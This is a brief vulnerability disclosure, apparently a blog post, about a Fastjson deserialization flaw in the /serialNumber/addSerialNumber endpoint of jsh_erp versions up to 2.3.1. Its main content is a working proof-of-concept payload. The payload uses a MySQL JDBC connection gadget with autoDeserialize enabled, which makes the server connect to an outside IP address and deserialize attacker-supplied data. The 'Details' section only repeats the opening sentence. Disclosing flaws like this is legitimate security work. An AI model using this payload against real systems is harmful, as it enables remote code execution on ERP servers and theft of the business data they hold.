jsh_erp5

Pax

2025-06-01 (Updated: 2025-06-01)

The `/serialNumber/addSerialNumber` endpoint is vulnerable to a Fastjson deserialization attack.

Vulnerable Versions: <= v2.3.1

Vulnerable Endpoint: /serialNumber/addSerialNumber

Proof of Concept (POC):

info={"name":"22","type":"","description":{"@type":"com.mysql.jdbc.JDBC4Connection","hostToConnectTo":"120.26.138.45","portToConnectTo":3308,"info":{"user":"user","password":"pass","statementInterceptors":"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor","autoDeserialize":"true","NUM_HOSTS":"1"},"databaseToConnectTo":"d645873","url":"xxx"}}

Details:

The /serialNumber/addSerialNumber endpoint is vulnerable to a Fastjson deserialization attack.

The `/serialNumber/addSerialNumber` endpoint is vulnerable to a Fastjson deserialization attack.